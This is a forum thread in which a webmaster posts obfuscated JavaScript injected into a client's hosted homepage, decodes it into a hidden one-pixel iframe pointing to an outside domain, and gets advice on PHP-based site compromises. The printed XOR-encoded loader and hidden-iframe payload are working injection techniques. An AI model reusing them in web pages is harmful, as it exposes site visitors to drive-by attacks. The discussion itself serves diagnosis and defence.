RichB

Anyone any experience of this.

I have a clients site hosted at Fasthosts.

Their home page suddenly took longer to load and I noticed some javascript...

<script language="JavaScript">
e = '0x00' + '46';
str1 = "%FD%A5%AE%B3%D9%B4%B5%BE%AD%A2%FA%E7%B3%AE%B4%AE% A7%AE%AD%AE%B5%BE%FF%A1%AE%A5%A5%A2%AB%E7%FB%FD%AE %A3%B7%A6%AA%A2%D9%B4%B7%A4%FA%E7%A1%B5%B5%A9%FF%E 8%E8%A1%A1%A1%A0%F6%EB%A4%A8%AA%E8%AA%A2%AB%B5%E8% E7%D9%B0%AE%A5%B5%A1%FA%F6%D9%A1%A2%AE%A0%A1%B5%FA %F6%FB%FD%E8%AE%A3%B7%A6%AA%A2%FB%FD%E8%A5%AE%B3%F B";
str=tmp='';
for(i=0;i<str1.length;i+=3)
{
tmp = unescape(str1.slice(i,i+3));
str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);
}

Then it writes that string out.....
</script>

The result of that is the following decrypted:

<div style="visibility:hidden">
<iframesrc="http://hhhg1.com/ment/" width=1height=1>
</iframe>
</div>


Anyone else seen this?
Know what it does?

Rich

Iain Young

Well, it creates a hidden iframe, the src of which points to a web address that (at the moment) doesn't seem to exist. So it won't do anything at the moment.

My guess is that it was (or will be) trying to install some dodgy tracking cookies or something of the ilk...

ChefDude

my g/f's site got hacked recently. all the links in the site were replaced with links to a viagra type site and there was similar javascript in the header that you have.

fortunately I had a backup, so wiped the site, changed the password and re uploaded.

had to kill all my local cookies etc too

bastids

ChefDude

apparently they do this to increase their standings in the search engine ranks

cottonfoo

You guys running PHP by any chance?

ChefDude

yup. it was the cheap option

RichB

Yes and MySql - Any top tips on what to look for cottonfoo?

Contact form stuffing?

In theory only me and their IT support company have FTP access to the site.

cottonfoo

PHP has some fundamental issues as it is, let alone any flaws present in any software written in it:

PHP security under scrutiny | The Register

The PHP problems have been going on for a while.

"The PHP Group will jump into your boat as soon you try to blame PHP's security problems on the user, but the moment you criticise the security of PHP itself you become persona non grata."

From Retired from security@php.net - PHP Security Blog

cookstar

iTrader: (6)

cottonfoo

They didn't use your password, they used a flaw in the software you're using, so they could easily come back today and do it again.

mykp

have a look at the files in the directory and make sure there is no file called up.php which is a common hacker tool they use. Once on your site, they can do as they please to your website. Only have one PHP site and its been hacked a number of times, every time through the php.

RichB

how does they write stuff into your files?
Is it because the IUSR (Yes windows IIS) has write permissions or something...

Sadly I don't have control over the server itself.

I managed to upload some code to allow me complete access to another ISPs shared site servers files and folders. Obviously I needed access to get the file up there and I would imagine I could do the same thing and insert my javascript to every file on the server should I desire...

I've not really found any 'this is how they did it' or 'this is how I stopped it' type pages though.

Any other links cottonfoo?

cottonfoo

Loads, but this is a family forum There isn't really much you can do unless you have control of the server. Have you told the ISP their services have been compromised?

I'd search on "<the PHP application you use> exploits security" or something to see possible entry points, make sure you know exactly what versions of what you're using.